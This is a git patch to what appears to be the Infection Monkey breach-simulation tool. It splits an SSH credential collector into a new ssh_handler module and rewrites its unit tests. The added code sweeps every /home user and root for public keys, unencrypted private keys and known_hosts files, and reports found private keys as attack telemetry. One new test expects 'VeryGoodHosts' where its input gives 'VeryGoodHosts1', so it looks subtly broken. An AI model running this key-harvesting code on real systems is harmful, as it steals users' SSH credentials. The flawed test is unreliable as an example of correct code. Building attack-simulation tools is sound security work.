From e9e5e95f49ae84571a46dade82c19c7f0679b112 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski <ilija.la@live.com>
Date: Tue, 15 Feb 2022 14:56:58 +0100
Subject: [PATCH] Agent, UT: Separate ssh_handler from SSH Credential Collector

* Add different UTs based on what ssh_handler returns
* Fix logic in SSH Credential Collector
---
 .../SSH_credentials_collector.py              | 131 +++-------------
 .../ssh_collector/ssh_handler.py              | 112 ++++++++++++++
 .../ssh_info/ssh_info_full/id_12345           |   3 -
 .../ssh_info/ssh_info_full/id_12345.pub       |   1 -
 .../ssh_info/ssh_info_full/known_hosts        |   4 -
 .../ssh_info_no_public_key/giberrish_file.txt |   0
 .../ssh_info/ssh_info_partial/id_12345.pub    |   1 -
 .../test_ssh_credentials_collector.py         | 145 ++++++++----------
 8 files changed, 194 insertions(+), 203 deletions(-)
 create mode 100644 monkey/infection_monkey/credential_collectors/ssh_collector/ssh_handler.py
 delete mode 100644 monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345
 delete mode 100644 monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345.pub
 delete mode 100644 monkey/tests/data_for_tests/ssh_info/ssh_info_full/known_hosts
 delete mode 100644 monkey/tests/data_for_tests/ssh_info/ssh_info_no_public_key/giberrish_file.txt
 delete mode 100644 monkey/tests/data_for_tests/ssh_info/ssh_info_partial/id_12345.pub

diff --git a/monkey/infection_monkey/credential_collectors/ssh_collector/SSH_credentials_collector.py b/monkey/infection_monkey/credential_collectors/ssh_collector/SSH_credentials_collector.py
index 2e5eba0f7..778a5788a 100644
--- a/monkey/infection_monkey/credential_collectors/ssh_collector/SSH_credentials_collector.py
+++ b/monkey/infection_monkey/credential_collectors/ssh_collector/SSH_credentials_collector.py
@@ -1,17 +1,13 @@
-import glob
 import logging
-import os
-import pwd
-from typing import Dict, Iterable
+from typing import Dict, Iterable, List
 
-from common.utils.attack_utils import ScanStatus
 from infection_monkey.credential_collectors import (
     Credentials,
     ICredentialCollector,
     SSHKeypair,
     Username,
 )
-from infection_monkey.telemetry.attack.t1005_telem import T1005Telem
+from infection_monkey.credential_collectors.ssh_collector import ssh_handler
 
 logger = logging.getLogger(__name__)
 
@@ -21,121 +17,32 @@ class SSHCollector(ICredentialCollector):
     SSH keys and known hosts collection module
     """
 
-    default_dirs = ["/.ssh/", "/"]
-
-    def collect_credentials(self) -> Credentials:
+    def collect_credentials(self, _options=None) -> List[Credentials]:
         logger.info("Started scanning for SSH credentials")
-        home_dirs = SSHCollector._get_home_dirs()
-        ssh_info = SSHCollector._get_ssh_files(home_dirs)
+        ssh_info = ssh_handler.get_ssh_info()
         logger.info("Scanned for SSH credentials")
 
         return SSHCollector._to_credentials(ssh_info)
 
     @staticmethod
-    def _to_credentials(ssh_info: Iterable[Dict]) -> Credentials:
-        credentials_obj = Credentials(identities=[], secrets=[])
+    def _to_credentials(ssh_info: Iterable[Dict]) -> List[Credentials]:
+        ssh_credentials = []
 
         for info in ssh_info:
-            credentials_obj.identities.append(Username(info["name"]))
+            credentials_obj = Credentials(identities=[], secrets=[])
+
+            if "name" in info and info["name"] != "":
+                credentials_obj.identities.append(Username(info["name"]))
+
             ssh_keypair = {}
-            if "public_key" in info:
-                ssh_keypair["public_key"] = info["public_key"]
-            if "private_key" in info:
-                ssh_keypair["private_key"] = info["private_key"]
-            if "public_key" in info:
-                ssh_keypair["known_hosts"] = info["known_hosts"]
+            for key in ["public_key", "private_key", "known_hosts"]:
+                if key in info and info.get(key) is not None:
+                    ssh_keypair[key] = info[key]
 
-            credentials_obj.secrets.append(SSHKeypair(ssh_keypair))
+            if len(ssh_keypair):
+                credentials_obj.secrets.append(SSHKeypair(ssh_keypair))
 
-        return credentials_obj
+            if credentials_obj.identities != [] or credentials_obj.secrets != []:
+                ssh_credentials.append(credentials_obj)
 
-    @staticmethod
-    def _get_home_dirs() -> Iterable[Dict]:
-        root_dir = SSHCollector._get_ssh_struct("root", "")
-        home_dirs = [
-            SSHCollector._get_ssh_struct(x.pw_name, x.pw_dir)
-            for x in pwd.getpwall()
-            if x.pw_dir.startswith("/home")
-        ]
-        home_dirs.append(root_dir)
-        return home_dirs
-
-    @staticmethod
-    def _get_ssh_struct(name: str, home_dir: str) -> Dict:
-        """
-        Construct the SSH info. It consisted of: name, home_dir,
-        public_key, private_key and known_hosts.
-
-        public_key: contents of *.pub file (public key)
-        private_key: contents of * file (private key)
-        known_hosts: contents of known_hosts file(all the servers keys are good for,
-        possibly hashed)
-
-        :param name: username of user, for whom the keys belong
-        :param home_dir: users home directory
-        :return: SSH info struct
-        """
-        return {
-            "name": name,
-            "home_dir": home_dir,
-            "public_key": None,
-            "private_key": None,
-            "known_hosts": None,
-        }
-
-    @staticmethod
-    def _get_ssh_files(usr_info: Iterable[Dict]) -> Iterable[Dict]:
-        for info in usr_info:
-            path = info["home_dir"]
-            for directory in SSHCollector.default_dirs:
-                if os.path.isdir(path + directory):
-                    try:
-                        current_path = path + directory
-                        # Searching for public key
-                        if glob.glob(os.path.join(current_path, "*.pub")):
-                            # Getting first file in current path with .pub extension(public key)
-                            public = glob.glob(os.path.join(current_path, "*.pub"))[0]
-                            logger.info("Found public key in %s" % public)
-                            try:
-                                with open(public) as f:
-                                    info["public_key"] = f.read()
-                                # By default private key has the same name as public,
-                                # only without .pub
-                                private = os.path.splitext(public)[0]
-                                if os.path.exists(private):
-                                    try:
-                                        with open(private) as f:
-                                            # no use from ssh key if it's encrypted
-                                            private_key = f.read()
-                                            if private_key.find("ENCRYPTED") == -1:
-                                                info["private_key"] = private_key
-                                                logger.info("Found private key in %s" % private)
-                                                T1005Telem(
-                                                    ScanStatus.USED, "SSH key", "Path: %s" % private
-                                                ).send()
-                                            else:
-                                                continue
-                                    except (IOError, OSError):
-                                        pass
-                                # By default, known hosts file is called 'known_hosts'
-                                known_hosts = os.path.join(current_path, "known_hosts")
-                                if os.path.exists(known_hosts):
-                                    try:
-                                        with open(known_hosts) as f:
-                                            info["known_hosts"] = f.read()
-                                            logger.info("Found known_hosts in %s" % known_hosts)
-                                    except (IOError, OSError):
-                                        pass
-                                # If private key found don't search more
-                                if info["private_key"]:
-                                    break
-                            except (IOError, OSError):
-                                pass
-                    except OSError:
-                        pass
-        usr_info = [
-            info
-            for info in usr_info
-            if info["private_key"] or info["known_hosts"] or info["public_key"]
-        ]
-        return usr_info
+        return ssh_credentials
diff --git a/monkey/infection_monkey/credential_collectors/ssh_collector/ssh_handler.py b/monkey/infection_monkey/credential_collectors/ssh_collector/ssh_handler.py
new file mode 100644
index 000000000..30f1408a2
--- /dev/null
+++ b/monkey/infection_monkey/credential_collectors/ssh_collector/ssh_handler.py
@@ -0,0 +1,112 @@
+import glob
+import logging
+import os
+import pwd
+from typing import Dict, Iterable
+
+from common.utils.attack_utils import ScanStatus
+from infection_monkey.telemetry.attack.t1005_telem import T1005Telem
+
+logger = logging.getLogger(__name__)
+
+DEFAULT_DIRS = ["/.ssh/", "/"]
+
+
+def get_ssh_info() -> Iterable[Dict]:
+    home_dirs = _get_home_dirs()
+    ssh_info = _get_ssh_files(home_dirs)
+
+    return ssh_info
+
+
+def _get_home_dirs() -> Iterable[Dict]:
+    root_dir = _get_ssh_struct("root", "")
+    home_dirs = [
+        _get_ssh_struct(x.pw_name, x.pw_dir) for x in pwd.getpwall() if x.pw_dir.startswith("/home")
+    ]
+    home_dirs.append(root_dir)
+    return home_dirs
+
+
+def _get_ssh_struct(name: str, home_dir: str) -> Dict:
+    """
+    Construct the SSH info. It consisted of: name, home_dir,
+    public_key, private_key and known_hosts.
+
+    public_key: contents of *.pub file (public key)
+    private_key: contents of * file (private key)
+    known_hosts: contents of known_hosts file(all the servers keys are good for,
+    possibly hashed)
+
+    :param name: username of user, for whom the keys belong
+    :param home_dir: users home directory
+    :return: SSH info struct
+    """
+    # TODO: There may be multiple public keys for a single user
+    # TODO: Authorized keys are missing.
+    return {
+        "name": name,
+        "home_dir": home_dir,
+        "public_key": None,
+        "private_key": None,
+        "known_hosts": None,
+    }
+
+
+def _get_ssh_files(usr_info: Iterable[Dict]) -> Iterable[Dict]:
+    for info in usr_info:
+        path = info["home_dir"]
+        for directory in DEFAULT_DIRS:
+            # TODO: Use PATH
+            if os.path.isdir(path + directory):
+                try:
+                    current_path = path + directory
+                    # Searching for public key
+                    if glob.glob(os.path.join(current_path, "*.pub")):
+                        # TODO: There may be multiple public keys for a single user
+                        # Getting first file in current path with .pub extension(public key)
+                        public = glob.glob(os.path.join(current_path, "*.pub"))[0]
+                        logger.info("Found public key in %s" % public)
+                        try:
+                            with open(public) as f:
+                                info["public_key"] = f.read()
+                            # By default, private key has the same name as public,
+                            # only without .pub
+                            private = os.path.splitext(public)[0]
+                            if os.path.exists(private):
+                                try:
+                                    with open(private) as f:
+                                        # no use from ssh key if it's encrypted
+                                        private_key = f.read()
+                                        if private_key.find("ENCRYPTED") == -1:
+                                            info["private_key"] = private_key
+                                            logger.info("Found private key in %s" % private)
+                                            T1005Telem(
+                                                ScanStatus.USED, "SSH key", "Path: %s" % private
+                                            ).send()
+                                        else:
+                                            continue
+                                except (IOError, OSError):
+                                    pass
+                            # By default, known hosts file is called 'known_hosts'
+                            known_hosts = os.path.join(current_path, "known_hosts")
+                            if os.path.exists(known_hosts):
+                                try:
+                                    with open(known_hosts) as f:
+                                        info["known_hosts"] = f.read()
+                                        logger.info("Found known_hosts in %s" % known_hosts)
+                                except (IOError, OSError):
+                                    pass
+                            # If private key found don't search more
+                            if info["private_key"]:
+                                break
+                        except (IOError, OSError):
+                            pass
+                except OSError:
+                    pass
+    usr_info = [
+        info
+        for info in usr_info
+        if info["private_key"] or info["known_hosts"] or info["public_key"]
+    ]
+    return usr_info
diff --git a/monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345 b/monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345
deleted file mode 100644
index 54616cc11..000000000
--- a/monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345
+++ /dev/null
@@ -1,3 +0,0 @@
------BEGIN OPENSSH PRIVATE KEY-----
-LoremIpsumSomethingNothing
------END OPENSSH PRIVATE KEY-----
diff --git a/monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345.pub b/monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345.pub
deleted file mode 100644
index 082f12abd..000000000
--- a/monkey/tests/data_for_tests/ssh_info/ssh_info_full/id_12345.pub
+++ /dev/null
@@ -1 +0,0 @@
-ssh-ed25519 something-public-here valid.email@at-email.com
diff --git a/monkey/tests/data_for_tests/ssh_info/ssh_info_full/known_hosts b/monkey/tests/data_for_tests/ssh_info/ssh_info_full/known_hosts
deleted file mode 100644
index 8e95ebb9a..000000000
--- a/monkey/tests/data_for_tests/ssh_info/ssh_info_full/known_hosts
+++ /dev/null
@@ -1,4 +0,0 @@
-|1|really+known+host|known_host1
-|1|really+known+host|known_host2
-|1|really+known+host|known_host3
-|1|really+known+host|known_host4
diff --git a/monkey/tests/data_for_tests/ssh_info/ssh_info_no_public_key/giberrish_file.txt b/monkey/tests/data_for_tests/ssh_info/ssh_info_no_public_key/giberrish_file.txt
deleted file mode 100644
index e69de29bb..000000000
diff --git a/monkey/tests/data_for_tests/ssh_info/ssh_info_partial/id_12345.pub b/monkey/tests/data_for_tests/ssh_info/ssh_info_partial/id_12345.pub
deleted file mode 100644
index 082f12abd..000000000
--- a/monkey/tests/data_for_tests/ssh_info/ssh_info_partial/id_12345.pub
+++ /dev/null
@@ -1 +0,0 @@
-ssh-ed25519 something-public-here valid.email@at-email.com
diff --git a/monkey/tests/unit_tests/infection_monkey/credential_collectors/linux_credentials_collector/test_ssh_credentials_collector.py b/monkey/tests/unit_tests/infection_monkey/credential_collectors/linux_credentials_collector/test_ssh_credentials_collector.py
index 8a7cda3c7..0225b07e2 100644
--- a/monkey/tests/unit_tests/infection_monkey/credential_collectors/linux_credentials_collector/test_ssh_credentials_collector.py
+++ b/monkey/tests/unit_tests/infection_monkey/credential_collectors/linux_credentials_collector/test_ssh_credentials_collector.py
@@ -1,94 +1,75 @@
-import os
-import pwd
-from pathlib import Path
-
-import pytest
-
-from infection_monkey.credential_collectors import SSHKeypair, Username
+from infection_monkey.credential_collectors import Credentials, SSHKeypair, Username
 from infection_monkey.credential_collectors.ssh_collector import SSHCollector
 
 
-@pytest.fixture
-def project_name(pytestconfig):
-    home_dir = str(Path.home())
-    return "/" / Path(str(pytestconfig.rootdir).replace(home_dir, ""))
-
-
-@pytest.fixture
-def ssh_test_dir(project_name):
-    return project_name / "monkey" / "tests" / "data_for_tests" / "ssh_info"
-
-
-@pytest.fixture
-def get_username():
-    return pwd.getpwuid(os.getuid()).pw_name
-
-
-@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
-def test_ssh_credentials_collector_success(ssh_test_dir, get_username, monkeypatch):
+def patch_ssh_handler(ssh_creds, monkeypatch):
     monkeypatch.setattr(
-        "infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
-        [str(ssh_test_dir / "ssh_info_full")],
+        "infection_monkey.credential_collectors.ssh_collector.ssh_handler.get_ssh_info",
+        lambda: ssh_creds,
     )
 
-    ssh_credentials = SSHCollector().collect_credentials()
 
-    assert len(ssh_credentials.identities) == 1
-    assert type(ssh_credentials.identities[0]) == Username
-    assert "username" in ssh_credentials.identities[0].content
-    assert ssh_credentials.identities[0].content["username"] == get_username
+def test_ssh_credentials_empty_results(monkeypatch):
+    patch_ssh_handler([], monkeypatch)
+    collected = SSHCollector().collect_credentials()
+    assert [] == collected
 
-    assert len(ssh_credentials.secrets) == 1
-    assert type(ssh_credentials.secrets[0]) == SSHKeypair
+    ssh_creds = [
+        {"name": "", "home_dir": "", "public_key": None, "private_key": None, "known_hosts": None}
+    ]
+    patch_ssh_handler(ssh_creds, monkeypatch)
+    expected = []
+    collected = SSHCollector().collect_credentials()
+    assert expected == collected
 
-    assert len(ssh_credentials.secrets[0].content) == 3
-    assert (
-        ssh_credentials.secrets[0]
-        .content["private_key"]
-        .startswith("-----BEGIN OPENSSH PRIVATE KEY-----")
+
+def test_ssh_info_result_parsing(monkeypatch):
+
+    ssh_creds = [
+        {
+            "name": "ubuntu",
+            "home_dir": "/home/ubuntu",
+            "public_key": "SomePublicKeyUbuntu",
+            "private_key": "ExtremelyGoodPrivateKey",
+            "known_hosts": "MuchKnownHosts",
+        },
+        {
+            "name": "mcus",
+            "home_dir": "/home/mcus",
+            "public_key": "AnotherPublicKey",
+            "private_key": "NotSoGoodPrivateKey",
+            "known_hosts": None,
+        },
+        {
+            "name": "",
+            "home_dir": "/",
+            "public_key": None,
+            "private_key": None,
+            "known_hosts": "VeryGoodHosts1",
+        },
+    ]
+    patch_ssh_handler(ssh_creds, monkeypatch)
+
+    # Expected credentials
+    username = Username("ubuntu")
+    username2 = Username("mcus")
+
+    ssh_keypair1 = SSHKeypair(
+        {
+            "public_key": "SomePublicKeyUbuntu",
+            "private_key": "ExtremelyGoodPrivateKey",
+            "known_hosts": "MuchKnownHosts",
+        }
     )
-    assert (
-        ssh_credentials.secrets[0]
-        .content["public_key"]
-        .startswith("ssh-ed25519 something-public-here")
+    ssh_keypair2 = SSHKeypair(
+        {"public_key": "AnotherPublicKey", "private_key": "NotSoGoodPrivateKey"}
     )
-    assert ssh_credentials.secrets[0].content["known_hosts"].startswith("|1|really+known+host")
+    ssh_keypair3 = SSHKeypair({"known_hosts": "VeryGoodHosts"})
 
-
-@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
-def test_no_ssh_credentials(monkeypatch):
-    monkeypatch.setattr(
-        "infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs", []
-    )
-
-    ssh_credentials = SSHCollector().collect_credentials()
-
-    assert len(ssh_credentials.identities) == 0
-    assert len(ssh_credentials.secrets) == 0
-
-
-@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
-def test_ssh_collector_partial_credentials(monkeypatch, ssh_test_dir):
-    monkeypatch.setattr(
-        "infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
-        [str(ssh_test_dir / "ssh_info_partial")],
-    )
-
-    ssh_credentials = SSHCollector().collect_credentials()
-
-    assert len(ssh_credentials.secrets[0].content) == 3
-    assert ssh_credentials.secrets[0].content["private_key"] is None
-    assert ssh_credentials.secrets[0].content["known_hosts"] is None
-
-
-@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
-def test_ssh_collector_no_public_key(monkeypatch, ssh_test_dir):
-    monkeypatch.setattr(
-        "infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
-        [str(ssh_test_dir / "ssh_info_no_public_key")],
-    )
-
-    ssh_credentials = SSHCollector().collect_credentials()
-
-    assert len(ssh_credentials.identities) == 0
-    assert len(ssh_credentials.secrets) == 0
+    expected = [
+        Credentials(identities=[username], secrets=[ssh_keypair1]),
+        Credentials(identities=[username2], secrets=[ssh_keypair2]),
+        Credentials(identities=[], secrets=[ssh_keypair3]),
+    ]
+    collected = SSHCollector().collect_credentials()
+    assert expected == collected